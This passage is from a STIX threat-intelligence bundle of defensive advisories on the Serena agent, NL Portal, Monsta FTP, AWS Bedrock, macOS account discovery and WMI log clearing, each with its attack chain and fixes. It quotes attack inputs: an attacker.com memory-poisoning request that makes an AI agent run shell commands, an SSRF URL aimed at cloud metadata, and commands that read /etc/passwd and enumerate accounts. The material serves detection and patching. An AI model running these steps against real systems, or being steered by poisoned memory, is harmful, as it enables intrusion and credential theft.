      "relationship_type": "uses",
      "source_ref": "report--b25b405b-ce1e-5ce0-beb8-24c54c9c976e",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a367ad3d-972c-5994-af48-e202cde14481",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b25b405b-ce1e-5ce0-beb8-24c54c9c976e",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6d1cbcd8-9f89-58bf-92e4-548fc01a007e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b25b405b-ce1e-5ce0-beb8-24c54c9c976e",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9ad21531-1ad5-5fa8-8bab-db8acfae92b2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b25b405b-ce1e-5ce0-beb8-24c54c9c976e",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--866311ba-d235-5965-b398-3f6a5135ee52",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1498",
          "url": "https://attack.mitre.org/techniques/T1498"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--35987949-2485-53b7-b4d1-7357b40cf6fe",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b25b405b-ce1e-5ce0-beb8-24c54c9c976e",
      "target_ref": "attack-pattern--866311ba-d235-5965-b398-3f6a5135ee52"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b25b405b-ce1e-5ce0-beb8-24c54c9c976e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Serena Agent Unauthenticated RCE via DNS Rebinding (CVE-2026-49471)",
      "description": "## Overview\n\nCVE-2026-49471 details a critical vulnerability in the Serena agent, affecting versions prior to 1.5.2. This vulnerability stems from an unauthenticated Flask web dashboard that is automatically enabled by default on a fixed and predictable TCP port 24282. The dashboard lacks authentication, CSRF protection, and Host header validation, making it susceptible to DNS rebinding attacks. An attacker can trick a victim, running the vulnerable Serena agent, into visiting a malicious webpage. This webpage leverages DNS rebinding to proxy requests to the local Serena dashboard, poisoning its persistent memory store with attacker-controlled content. When the agent subsequently processes this memory, it executes the injected commands via `subprocess.Popen` with `shell=True`, leading to full OS-level remote code execution. This allows attackers to achieve persistence, exfiltrate data, access agent logs, and perform denial-of-service.\n\n## Attack Chain\n\n1. An attacker registers a domain (e.g., `attacker.com`) with a short DNS Time-To-Live (TTL) and hosts a malicious webpage.\n2. A victim, running a vulnerable Serena agent (version \u003c 1.5.2) with the default `web_dashboard: true` setting, visits the attacker-controlled webpage.\n3. The attacker's webpage immediately rebinds its DNS resolution from the attacker's server to `127.0.0.1` after the initial page load.\n4. Malicious JavaScript on the webpage sends a POST request to `attacker.com:24282/save_memory`, which the victim's browser now resolves to the local Serena agent's dashboard due to the DNS rebinding.\n5. Serena's unauthenticated Flask dashboard on TCP 24282 accepts the `/save_memory` request, writing attacker-controlled content (e.g., an `execute_shell_command`) to the agent's persistent memory store.\n6. In a subsequent agent session or when processing new tasks, the Serena agent reads the poisoned memory from disk.\n7. The Serena agent then attempts to execute the attacker-controlled command using `subprocess.Popen(command, shell=True)`, where `shell=True` enables direct shell command execution.\n8. This results in full OS-level remote code execution on the victim's machine, allowing the attacker to exfiltrate data, maintain persistence, or further compromise the system.\n\n## Impact\n\nCVE-2026-49471 poses a severe risk to any user operating the Serena agent with its default configuration. Successful exploitation allows an attacker, without any credentials or prior access, to gain OS-level remote code execution on the victim's system. Beyond RCE, attackers can inject persistent prompt-injection payloads into the agent's memory, read sensitive agent activity logs (including conversation history and project details), overwrite the Serena configuration file, and trigger a denial-of-service by shutting down the agent. While no specific victim counts are provided, all users of affected Serena agent versions are at risk if targeted by a malicious webpage.\n\n## Recommendation\n\n* **Patch CVE-2026-49471** by upgrading Serena agent to version 1.5.2 or later immediately.\n* **Deploy the Sigma rule** provided in this brief to detect suspicious process execution originating from the Serena agent.\n* **Enable Sysmon process-creation logging** (Event ID 1) on endpoints running the Serena agent to activate detection of suspicious shell activity.\n* **Block known attacker infrastructure** such as `attacker.com` at the DNS resolver or web proxy to prevent initial access via DNS rebinding and potential C2 communication.\n* **Review Serena agent configuration** and consider disabling `web_dashboard: true` if its functionality is not explicitly required in your environment.\n",
      "published": "2026-07-08T21:13:57Z",
      "labels": [
        "remote-code-execution",
        "dns-rebinding",
        "persistence",
        "command-and-control",
        "python",
        "flask",
        "agent"
      ],
      "object_refs": [
        "indicator--26122eba-3a76-5d8e-b4d8-9fe944782d5c",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--866311ba-d235-5965-b398-3f6a5135ee52"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-37h2-6p4f-mp3q"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Cloud Storage",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1530",
          "url": "https://attack.mitre.org/techniques/T1530"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--91e250e4-d7a7-5022-a7d0-ab6bfb9a7eef",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0951fb78-e855-59d8-99b3-855deefe7d3b",
      "target_ref": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Destruction",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1485",
          "url": "https://attack.mitre.org/techniques/T1485"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f3eb6ddc-a1a2-55bb-a5df-79073d8f20e9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0951fb78-e855-59d8-99b3-855deefe7d3b",
      "target_ref": "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--0951fb78-e855-59d8-99b3-855deefe7d3b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "NL Portal IDOR Vulnerability Allows Tampering and Data Leakage of Other Users' Tasks (CVE-2026-49464)",
      "description": "## Overview\n\nA high-severity Insecure Direct Object Reference (IDOR) vulnerability, tracked as CVE-2026-49464, has been identified in the NL Portal's Taak V2 implementation, affecting versions from 1.5.0 up to and including 3.0.0. This flaw permits any authenticated portal user (`burger` OAuth token holder) to manipulate and access other users' open tasks without proper authorization. Attackers can leverage this by submitting a known task ID to the `submitTaakV2` GraphQL endpoint, which lacks adequate authorization checks. This enables malicious users to mark tasks as completed, overwrite the `verzonden_data` with arbitrary input, and illicitly retrieve the full task, including sensitive, previously entered `portaalformulier` data from the legitimate owner. The vulnerable code was introduced in commit `bb1c1ecf` (2024-06-04) and shipped with the 1.5.x release line.\n\n## Attack Chain\n\n1. An authenticated attacker obtains a valid `burger` OAuth token to access the NL Portal.\n2. The attacker identifies a target user's specific task ID (UUID), possibly through enumeration, social engineering, or prior compromise.\n3. The attacker crafts a malicious GraphQL mutation request targeting the `submitTaakV2` endpoint.\n4. The request includes the victim's task ID and arbitrary data intended to overwrite the original `submission` (`verzonden_data`).\n5. The NL Portal backend, specifically the `nl.nlportal.zgw.taak.service.TaakService.submitTaakV2` resolver, processes the request without verifying if the task belongs to the authenticated user.\n6. The backend transitions the identified task to the `AFGEROND` (completed) state and overwrites the `record.data.portaalformulier.verzondenData` with the attacker's supplied input.\n7. The attacker receives the GraphQL response, which includes the entire task object, inadvertently exposing the legitimate owner's previously entered form data (confidentiality impact).\n8. The victim's task data is tampered with, its integrity is compromised, and their private information is leaked to the attacker.\n\n## Impact\n\nThis vulnerability significantly impacts both the integrity and confidentiality of user data within the NL Portal. Attackers can unilaterally mark other users' tasks as complete, regardless of their actual status, disrupting legitimate workflows. More critically, they can overwrite the data submitted with these tasks, leading to data corruption and potentially severe consequences depending on the nature of the forms. Furthermore, the attacker gains unauthorized access to sensitive personal data that other users had previously entered into their forms, violating privacy and potentially leading to further exploitation or identity theft. All users of NL Portal Taak versions 1.5.0 through 3.0.0 are at risk.\n\n## Recommendation\n\n* Upgrade NL Portal Taak to version **3.0.1** or later to address **CVE-2026-49464**.\n* As a temporary workaround, block the `submitTaakV2` GraphQL mutation at your API gateway as described in the brief.\n* Alternatively, restrict access to the `/graphql` endpoint to trusted networks only until the upgrade for **CVE-2026-49464** can be applied.\n",
      "published": "2026-07-08T21:14:46Z",
      "labels": [
        "idor",
        "graphql",
        "data-tampering",
        "data-leakage",
        "authentication-bypass",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897",
        "attack-pattern--67193ec2-dec7-586e-a385-cc0f1baa8526"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-6h3c-r723-7fx3"
        },
        {
          "source_name": "reference",
          "url": "CVE-2026-49464"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4e97cdb9-94dd-57e8-90f6-c5db527ea568",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f8372b34-5ac1-5fa1-bdcc-ec7787e24830",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1552",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2b5f8b03-7122-5032-826a-0887b30b4af2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f8372b34-5ac1-5fa1-bdcc-ec7787e24830",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f8372b34-5ac1-5fa1-bdcc-ec7787e24830",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-60105: Monsta FTP SSRF Vulnerability Leading to Credential Disclosure",
      "description": "## Overview\n\nMonsta FTP versions prior to 2.14.5 are vulnerable to a Server-Side Request Forgery (SSRF) flaw, identified as CVE-2026-60105. This vulnerability stems from an incomplete IP blocklist check within the `isBlockedIP()` function, which fails to correctly identify and block embedded IPv4 addresses present in IPv4-mapped IPv6 address formats. An unauthenticated attacker can leverage a publicly accessible endpoint, `getSystemVars`, to obtain a CSRF token. With this token, the attacker can then submit a crafted request to the `fetchRemoteFile` action. By specifying a source URL that resolves to an IPv4-mapped IPv6 address, the attacker can bypass Monsta FTP's internal IP filtering. This forces the vulnerable Monsta FTP server to initiate HTTP requests to internal network services, such as cloud instance metadata APIs, and then relay the responses to an attacker-controlled FTP server, leading to potential exposure of sensitive cloud credentials.\n\n## Attack Chain\n\n1. An unauthenticated attacker accesses the public `/getSystemVars` endpoint on the vulnerable Monsta FTP instance to retrieve a CSRF token.\n2. The attacker crafts a malicious `POST` request targeting the `fetchRemoteFile` action, including the obtained CSRF token.\n3. Within the `fetchRemoteFile` request, the attacker specifies a `sourceUrl` parameter containing an IPv4-mapped IPv6 address (e.g., `http://[::ffff:169.254.169.254]/latest/meta-data/`) pointing to an internal service, such as a cloud instance metadata API.\n4. The Monsta FTP server's `isBlockedIP()` function performs an incomplete IP blocklist check, failing to detect the embedded internal IPv4 address within the IPv4-mapped IPv6 format.\n5. Monsta FTP then initiates an HTTP GET request from the server itself to the internal `sourceUrl` specified by the attacker, effectively bypassing network segmentation.\n6. The server receives the response from the internal service (e.g., cloud metadata credentials).\n7. Monsta FTP subsequently writes this retrieved internal service response to an attacker-controlled FTP destination specified in the `fetchRemoteFile` request.\n8. The attacker retrieves the sensitive cloud instance metadata credentials from their controlled FTP server, achieving credential access.\n\n## Impact\n\nThe successful exploitation of CVE-2026-60105 by an unauthenticated attacker allows for Server-Side Request Forgery (SSRF), which can lead to significant compromise. The primary impact is the unauthorized retrieval of sensitive data, specifically cloud instance metadata credentials. If obtained, these credentials could grant the attacker extensive access to cloud resources, including virtual machines, storage buckets, and other cloud services associated with the compromised instance. This could result in further lateral movement, data exfiltration, or even complete takeover of the affected cloud environment, depending on the scope of the exposed credentials.\n\n## Recommendation\n\n* Patch CVE-2026-60105 immediately by upgrading Monsta FTP to version 2.14.5 or later.\n* Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect attempts to exploit CVE-2026-60105.\n* Enable comprehensive web server logging for your Monsta FTP instance to capture `cs-uri-stem` and `cs-uri-query` for all requests, particularly those hitting the `/index.php` path with `action=fetchRemoteFile`.\n",
      "published": "2026-07-08T21:19:16Z",
      "labels": [
        "server-side-request-forgery",
        "vulnerability",
        "web-application",
        "credential-access"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-60105"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a66c1634-b529-5c15-96fc-fb769fd097a2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f13bde07-e63c-544f-87be-d5cd7260ffe7",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f13bde07-e63c-544f-87be-d5cd7260ffe7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "AWS Bedrock API Key Phantom User Activity Outside Bedrock",
      "description": "## Overview\n\nThis threat brief details a privilege escalation scenario involving the misuse of Amazon Bedrock API key phantom users within an AWS environment. These phantom users, identified by names starting with \"BedrockAPIKey-\", are automatically provisioned by AWS to support Bedrock bearer tokens and come with the `AmazonBedrockLimitedAccess` managed policy. While this policy grants Bedrock control-plane actions, it also inadvertently allows reconnaissance capabilities across IAM, VPC, and KMS services. An attacker who has already gained initial access to the AWS account can exploit this by creating standard IAM access keys or a console login for these phantom users. Once these credentials are obtained, the attacker can leverage the phantom user's inherent permissions to perform reconnaissance, gather information, and potentially move laterally beyond the Bedrock authentication boundary, extending their access and control over the AWS infrastructure. This activity represents a realized privilege escalation, enabling broader access than initially intended for an inference-only Bedrock API key.\n\n## Attack Chain\n\n1. Attacker gains initial access to an AWS account or role with permissions to create or modify IAM user credentials (e.g., `iam:CreateAccessKey`, `iam:CreateLoginProfile`).\n2. Attacker identifies an existing AWS Bedrock API key phantom user (an IAM user whose name starts with \"BedrockAPIKey-*\").\n3. Attacker creates new standard IAM access keys or a console login profile for the targeted \"BedrockAPIKey-*\" phantom user.\n4. Attacker obtains the newly created IAM access keys or console login credentials.\n5. Attacker uses the compromised \"BedrockAPIKey-*\" credentials to make API calls to non-Bedrock AWS services (e.g., IAM, EC2, STS, VPC, KMS) for reconnaissance and enumeration of resources.\n6. Based on the information gathered during reconnaissance, the attacker performs lateral movement, accesses sensitive resources, or exfiltrates data from the AWS environment.\n\n## Impact\n\nIf this attack succeeds, an attacker can significantly expand their foothold within an AWS environment. By leveraging the `AmazonBedrockLimitedAccess` policy, which includes reconnaissance permissions for IAM, VPC, and KMS, the attacker can enumerate critical cloud resources and identify potential targets for further compromise. This bypasses the intended scope of the Bedrock API key, allowing unauthorized access to services and data beyond Bedrock. The consequence can range from unauthorized data exposure and modification to complete compromise of critical cloud infrastructure, leading to operational disruption, financial loss, and compliance failures. The attack can affect any AWS account using Bedrock API keys where the ability to create new credentials for phantom users is not adequately restricted.\n\n## Recommendation\n\n* Deploy the Sigma rule \"AWS Bedrock API Key Phantom User Activity Outside Bedrock\" to your SIEM to detect when `BedrockAPIKey-*` users make API calls to non-Bedrock services.\n* Investigate alerts from the Sigma rule by reviewing `aws.cloudtrail.user_identity.arn`, `event.provider`, and `event.action` to understand the scope of the non-Bedrock activity.\n* Inspect `source.ip` and `user_agent.original` for reported phantom user activity to identify the source of the anomalous calls and determine if standard IAM access keys or a login profile are being used.\n* Correlate anomalous phantom user activity with `CreateAccessKey` or `CreateLoginProfile` events for the same `BedrockAPIKey-*` user to identify the escalation pivot.\n* If unauthorized activity is confirmed, disable and remove the phantom user's IAM access keys and login profile.\n* Deploy AWS Service Control Policies (SCPs) to deny `iam:CreateAccessKey` and `iam:CreateLoginProfile` actions on resources matching the `arn:aws:iam::*:user/BedrockAPIKey-*` pattern to prevent this privilege escalation path.\n",
      "published": "2026-07-08T21:46:12Z",
      "labels": [
        "cloud-security",
        "privilege-escalation",
        "aws",
        "bedrock",
        "iam"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.beyondtrust.com/blog/entry/aws-bedrock-security-guide-api-keys-detection-response"
        },
        {
          "source_name": "reference",
          "url": "https://www.beyondtrust.com/blog/entry/aws-bedrock-security-api-keys"
        },
        {
          "source_name": "reference",
          "url": "https://docs.aws.amazon.com/bedrock/latest/userguide/api-keys.html"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1087",
          "url": "https://attack.mitre.org/techniques/T1087"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--af556d5d-dadc-53b6-b699-411b3037ab99",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4f7a510a-f08c-5e36-b828-6cb8ffe00463",
      "target_ref": "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4f7a510a-f08c-5e36-b828-6cb8ffe00463",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "macOS Local System Accounts Discovery",
      "description": "## Overview\n\nThis brief highlights the post-exploitation technique of discovering local system accounts on macOS environments. Threat actors, once gaining initial access, commonly employ a range of native macOS commands and utilities to map out the system's user landscape. These tools include directory service commands like `dscl` and `dscacheutil`, file system commands such as `cat` for `/etc/passwd`, and user enumeration commands like `id`, `who`, `w`, `users`, and `last`. Additionally, attackers may inspect home directories via `ls /Users` or system preference files using `defaults` and `plutil` to gather information about logged-in users or login configurations. The primary motivation for this reconnaissance is to identify potential targets for lateral movement, privilege escalation, or to understand the scope of user access on the compromised machine. This activity is a crucial step in the adversary's playbook, enabling them to expand their foothold and achieve their ultimate objectives, which could range from data exfiltration to deploying malware.\n\n## Attack Chain\n\n1. **Initial Access (Assumed)**: An adversary gains an initial foothold on a macOS system through an unspecified mechanism (e.g., malware execution, compromised credentials, exploitation of a vulnerability).\n2. **Execute `dscl` for User Listing**: The attacker executes `dscl . -list /Users` to list all local user accounts present on the system.\n3. **Execute `dscacheutil` for User Information**: The attacker runs `dscacheutil -q user` to query the directory service cache for detailed user information.\n4. **Inspect System Files for Accounts**: The attacker uses commands like `cat /etc/passwd`, potentially piped through `awk` or `grep`, to identify user accounts and their associated UIDs.\n5. **Enumerate Current and Past Logged-in Users**: Commands such as `id`, `who`, `w`, `users`, and `last` are used to determine currently active sessions, user IDs, and recent login history.\n6. **Scan User Home Directories**: The adversary lists the contents of the `/Users` directory using `ls /Users` to identify existing user profiles.\n7. **Inspect Login Window Preferences**: The attacker uses `defaults read /Library/Preferences/com.apple.loginwindow` or `plutil -p /Library/Preferences/com.apple.loginwindow.plist` to extract login window configurations, which might reveal additional user or system details.\n8. **Information Consolidation and Next Steps**: The gathered account information is then used to plan further actions, such as targeting specific users for credential compromise, attempting privilege escalation, or facilitating lateral movement to other systems.\n\n## Impact\n\nSuccessful enumeration of local system accounts provides adversaries with critical intelligence regarding potential targets for further compromise. This information can be leveraged to craft more effective phishing campaigns, identify users with elevated privileges, or determine accounts that are infrequently used but still active, making them ideal for persistence or lateral movement. The ultimate impact can range from expanded access within the network, unauthorized data exfiltration, to the deployment of ransomware or other destructive payloads if administrative accounts are identified and compromised. While this specific activity is informational, it directly contributes to more severe stages of an attack.\n\n## Recommendation\n\n* Deploy the Sigma rule \"macOS Local System Accounts Discovery\" to your SIEM to detect suspicious enumeration activity.\n* Ensure macOS process creation logging is enabled for all endpoints to allow the above rule to function effectively.\n* Review alerts generated by this rule to identify legitimate administrative activities versus potential malicious reconnaissance.\n* Implement strong authentication mechanisms and privilege access management (PAM) solutions to limit the impact of compromised credentials identified via such discovery activities.\n",
      "published": "2026-07-08T23:15:55Z",
      "labels": [
        "discovery",
        "reconnaissance",
        "macos"
      ],
      "object_refs": [
        "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md"
        },
        {
          "source_name": "reference",
          "url": "https://ss64.com/osx/dscl.html"
        },
        {
          "source_name": "reference",
          "url": "https://ss64.com/mac/dscacheutil.html"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/macos/process_creation/proc_creation_macos_local_account.yml"
        }
      ],
      "confidence": 40
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Indicator Removal",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1070",
          "url": "https://attack.mitre.org/techniques/T1070"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b210613b-ae4d-56e3-9b76-1f5caf62c888",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--1d654113-0ff6-5bc1-820f-4458de713db4",
      "target_ref": "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--1d654113-0ff6-5bc1-820f-4458de713db4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Detection of Failed WMI Event Log Clear Attempts",
      "description": "## Overview\n\nThis detection focuses on identifying instances where an attempt to clear Windows event logs via the Windows Management Instrumentation (WMI) `NTEventLogFile ClearEventLog` method fails. Such failures are recorded as `EventID 5858` within the `WMI-Activity` operational log. This event is specifically generated when the WMI operation encounters an error, such as access denied due to insufficient privileges or a provider failure. While this event indicates a failed action, it is a strong indicator that an attacker has attempted to impair defenses by removing forensic evidence. Successful event log clearing operations do *not* generate `EventID 5858` and would instead typically correlate with `Security event 1102` or `System event 104` for successful clearance. Detecting these failed attempts can provide an early warning of adversary activity before successful obfuscation occurs.\n\n## Impact\n\nA successful attempt to clear event logs can significantly hamper forensic investigations and incident response efforts by removing crucial evidence of malicious activity, including initial access, privilege escalation, and lateral movement. While this brief focuses on *failed* attempts, the fact that such an attempt occurred signifies an adversary's intent to impair system defenses. If these attempts were to succeed, organizations could face prolonged undetected breaches, making attribution and recovery exceedingly difficult, potentially leading to significant data exfiltration, system compromise, or financial losses without a clear audit trail.\n\n## Recommendation\n\n* Deploy the Sigma rule \"Detect Failed Event Log Clear Via WMI NTEventLogFile ClearEventLog\" to your SIEM system to identify failed attempts to clear event logs.\n* Ensure that `WMI-Activity` operational logs are enabled, collected, and ingested into your SIEM, as this is the log source for `EventID 5858` used by the rule.\n* Review alerts generated by this rule to investigate the source process attempting the `ClearEventLog` method, determine if the activity was legitimate (e.g., misconfigured admin script), and adjust permissions if necessary or escalate as a security incident.\n",
      "published": "2026-07-08T23:27:12Z",
      "labels": [
        "defense-evasion",
        "host-activity",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/builtin/wmi/win_wmi_activity_nteventlogfile_cleareventlog.yml"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/cleareventlog-method-in-class-win32-nteventlogfile"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Masquerading",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1036",
          "url": "https://attack.mitre.org/techniques/T1036"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d8e0751f-877c-599e-a8ab-3aa3961c0527",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--086c9c29-5ecb-58c9-bee1-e9c268afb432",
      "target_ref": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--76a01cce-b03a-5387-b7b2-4aeb5899b7e0",
      "created": "2026-07-09T17:20:22Z",
